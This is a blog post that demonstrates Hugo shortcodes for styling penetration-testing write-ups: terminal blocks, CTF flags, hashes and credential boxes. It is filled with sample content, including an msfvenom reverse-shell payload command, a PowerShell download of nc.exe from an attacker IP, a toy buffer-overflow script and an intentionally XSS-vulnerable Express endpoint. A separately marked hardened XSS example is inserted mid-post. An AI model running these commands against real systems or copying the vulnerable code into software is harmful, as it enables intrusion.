Terminal Shortcodes Demo

This post demonstrates all the custom terminal shortcodes available for creating macOS-style terminal blocks in your posts.

Attacker Terminal (Orange Header)

Use the attacker shortcode for commands run from your attacking machine. This terminal has an orange header and is perfect for pentesting commands.

Regular user ($):

kali
kali:~$ nmap -sC -sV -oA scan 10.10.10.237

Root user (#):

root@kali
root@kali:/opt/tools# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o payload.exe

Target Terminal (Blue Header)

Use the target shortcode for commands run on the target/victim machine. This terminal has a blue header to distinguish it from attacker commands.

Regular user ($):

www-data
www-data:/var/www/html$ ls -la

Root user (#):

root
root:/root# cat /root/flag.txt

Shell Terminal (Generic)

Use the shell shortcode for generic shell commands. This has a lighter macOS-style header. You can customize the title to describe the output.

Regular user ($):

Shell
$ echo "Hello World"

With custom title:

Checking Network Connection
$ ping -c 4 8.8.8.8

Root user (#):

Restarting Apache Service
# systemctl restart apache2

PowerShell Terminal (Windows)

Use the powershell shortcode for Windows PowerShell commands:

Windows PowerShell
PS C:\\Users\\Administrator> Get-Process | Where-Object {$_.CPU -gt 100}
Windows PowerShell
PS C:\\Windows\\Temp> Invoke-WebRequest -Uri http://10.10.14.5/nc.exe -OutFile nc.exe

CMD Terminal (Windows Command Prompt)

Use the cmd shortcode for Windows Command Prompt:

Command Prompt
C:\\Windows\\System32> dir /a
Command Prompt
C:\\inetpub\\wwwroot> type web.config

SQL Terminal (Database)

Use the sql shortcode for SQL database queries. This terminal has an orange header and supports custom database names and types.

Basic MySQL query:

MySQL Terminal
mysql> SELECT * FROM users WHERE admin=1;

With database name:

MySQL - webapp_db
mysql> SHOW TABLES;

PostgreSQL:

PostgreSQL - production
postgres=# \dt

MSSQL:

MSSQL - master
1> SELECT name FROM sys.databases;

Collapsible Output

Use the output shortcode for long command outputs. It’s collapsible to keep your posts clean. Notice the dashed border, italic title with arrow, and “Collapsible Output” label.

Nmap Scan Results
Collapsible Output
Directory Listing
Collapsible Output
total 48
drwxr-xr-x  5 www-data www-data 4096 Mar 11 10:00 .
drwxr-xr-x 12 root     root     4096 Jan 15 08:30 ..
-rw-r--r--  1 www-data www-data  220 Jan 15 08:30 .bash_logout
-rw-r--r--  1 www-data www-data 3526 Jan 15 08:30 .bashrc
drwxr-xr-x  3 www-data www-data 4096 Jan 15 08:45 .cache
-rw-r--r--  1 www-data www-data  807 Jan 15 08:30 .profile
drwxr-xr-x  2 www-data www-data 4096 Mar 11 09:45 uploads
-rw-r--r--  1 www-data www-data 1337 Mar 11 10:00 index.php

Multiple collapsible outputs work independently:

SQL Query Result #1
Collapsible Output
SQL Query Result #2
Collapsible Output

Security Shortcodes

CTF Flags

The flag shortcode supports different platforms and automatically styles user/root flags:

HackTheBox User Flag:

USER FLAG HTB
HTB{us3r_fl4g_3x4mpl3_h3r3}

HackTheBox Root Flag:

ROOT FLAG HTB
HTB{r00t_fl4g_3x4mpl3_h3r3}

OffSec OSCP Flag:

OSCP Local Flag OFFSEC
OS{0ff53c_l0c4l_pr00f}

TryHackMe Flag:

THM Flag THM
THM{try_h4ck_m3_fl4g}

Hashes

Use the hash shortcode to display password hashes with copy functionality:

MD5 Admin Password Hash
5f4dcc3b5aa765d61d8327deb882cf99
NTLM Windows Administrator Hash
8846f7eaee8fb117ad06bdd830b7586c
SHA256
5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8

Credentials

The credentials shortcode displays found credentials in a secure, organized format:

🔐 SSH
Username: admin
Password: P@ssw0rd123
Host: 10.10.10.237
Port: 22
Notes: Found in /var/www/config.php during enumeration
🔐 MySQL
Username: dbuser
Password: MySQLR0cks!
Host: localhost
Port: 3306
🔐 Web Portal
Username: administrator
Password: Welcome123!
URL: https://admin.example.com/login
Notes: Admin panel credentials discovered through OSINT

Screenshots with Captions

Use the figure shortcode for screenshots with professional captions:

Successful Exploitation
Shell obtained as www-data user after SQL injection

Shortcode Usage Reference

Attacker Terminal

{{< attacker prompt="kali" pwd="~" root="false" >}}
your command here
{{< /attacker >}}

Parameters:

  • prompt: Username (default: “kali@attacker”)
  • pwd: Current working directory (default: “~”)
  • root: Set to “true” for # prompt (default: “false”)

Target Terminal

{{< target prompt="www-data" pwd="/var/www" root="false" >}}
your command here
{{< /target >}}

Parameters:

  • prompt: Username (default: “victim@target”)
  • pwd: Current working directory (default: “~”)
  • root: Set to “true” for # prompt (default: “false”)

Shell Terminal

{{< shell root="false" >}}
your command here
{{< /shell >}}

Parameters:

  • title: Custom title for the terminal (default: “Shell”)
  • prompt: Custom prompt character (default: “$”)
  • root: Set to “true” for # prompt (default: “false”)

PowerShell Terminal

{{< powershell user="Administrator" path="C:\\Users\\Administrator" >}}
your command here
{{< /powershell >}}

Parameters:

  • user: Username (default: “Administrator”)
  • path: Current path (default: “C:\Users\Administrator”)

CMD Terminal

{{< cmd user="Administrator" path="C:\\Windows\\System32" >}}
your command here
{{< /cmd >}}

Parameters:

  • user: Username (default: “Administrator”)
  • path: Current path (default: “C:\Users\Administrator”)

SQL Terminal

{{< sql prompt="mysql>" database="mydb" type="MySQL" >}}
your query here
{{< /sql >}}

Parameters:

  • prompt: Database prompt (default: “mysql>”)
  • database: Database name to display in title
  • type: Database type (default: “MySQL”) - e.g., “PostgreSQL”, “MSSQL”, “SQLite”
  • title: Custom title (overrides database/type auto-title)

Collapsible Output

{{< output title="Command Output" collapsed="true" >}}
your output here
{{< /output >}}

Parameters:

  • title: Header title (default: “Command Output”)
  • collapsed: Initial state, “true” or “false” (default: “true”)
  • id: Unique identifier (auto-generated if not provided)

Syntax Highlighting Examples

Here are some examples showing the Dracula syntax highlighting theme in action:

Python Example

import socket


def exploit_vulnerability(target_ip, port=443):
    """Connect to target and exploit buffer overflow"""
    payload = b"\x90" * 100  # NOP sled
    shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68"

    try:
        # Context manager closes the socket on success and on error
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.connect((target_ip, port))
            sock.send(payload + shellcode)
        return True
    except Exception as e:
        print(f"Error: {e}")
        return False

JavaScript/Node.js Example

const express = require('express');
const app = express();

// Vulnerable endpoint - DO NOT USE IN PRODUCTION
app.get('/search', (req, res) => {
    const query = req.query.q;  // XSS vulnerability!
    res.send(`<h1>Results for: ${query}</h1>`);
});

app.listen(3000, () => {
    console.log('Server running on port 3000');
});
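
The `/search` handler above reflects `req.query.q` into HTML unencoded. A hardened form follows as an added example that is not part of the original post; `escapeHtml`, `normalizeQuery`, `renderSearch` and `safeSearch` are hypothetical names, and the 200-character cap is an assumed limit.

```javascript
// Added example: hardened counterpart of the /search handler above.
// All helper names here are hypothetical, not part of Express or the post.

const HTML_ESCAPES = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
};

// Encode the five characters that can change HTML text or attribute context.
function escapeHtml(value) {
    return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Express can parse ?q=a&q=b into an array (and ?q[x]=1 into an object
// with the extended parser), so accept only a plain string and cap its length.
function normalizeQuery(raw, maxLen = 200) {
    if (typeof raw !== 'string') return '';
    return raw.slice(0, maxLen);
}

// Build the response body with the user-controlled value encoded.
function renderSearch(raw) {
    return `<h1>Results for: ${escapeHtml(normalizeQuery(raw))}</h1>`;
}

// Handler for app.get('/search', safeSearch): same route as above.
function safeSearch(req, res) {
    res.set('Content-Type', 'text/html; charset=utf-8');
    // Defence in depth: no script execution even if encoding is missed elsewhere.
    res.set('Content-Security-Policy', "default-src 'none'");
    res.send(renderSearch(req.query.q));
}

// Constructed sample inputs (not from the original page).
const samples = ['nmap', '<script>alert(1)</script>', ['a', 'b'], undefined];
for (const s of samples) {
    console.log(JSON.stringify(s), '->', renderSearch(s));
}
```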

Bash Script Example

#!/bin/bash
# Enumeration script for penetration testing

TARGET="10.10.10.1"
PORTS="80,443,8080"

echo "[+] Starting enumeration of $TARGET"
# Quote variables and test nmap's exit status directly
if nmap -sC -sV -p "$PORTS" "$TARGET" -oN scan.txt; then
    echo "[+] Scan completed successfully"
    grep "open" scan.txt
else
    echo "[-] Scan failed"
    exit 1
fi

Features

Terminal Blocks:

  • macOS-Style Design: Authentic terminal window appearance with colored buttons
  • Multiple Terminal Types: Attacker (orange), Target (blue), Shell, PowerShell, CMD, SQL
  • Color-Coded Headers: Each terminal type has a distinct header color for easy identification
  • Root User Support: Use root="true" to show # instead of $ for privileged commands
  • Collapsible Output: Click the header to expand/collapse long outputs, with dashed border and label

Security Shortcodes:

  • Platform-Aware Flags: HTB (blue), OffSec (orange), TryHackMe (blue), CTF (orange)
  • User/Root Flags: Automatic icons (👤/👑) and titles for user and root flags
  • Hash Display: Blue boxes for password hash display
  • Credentials Box: Blue boxes for credentials with support for SSH, database, and web login details
  • Figure with Caption: Professional screenshot display with titles and captions

Universal:

  • Responsive: Works on mobile devices
  • Dark Mode Support: Adapts to site theme
  • Security: XSS protection via proper HTML escaping
  • Clean Design: No copy buttons - focus on content presentation

Enjoy using these blocks in your walkthroughs and tutorials!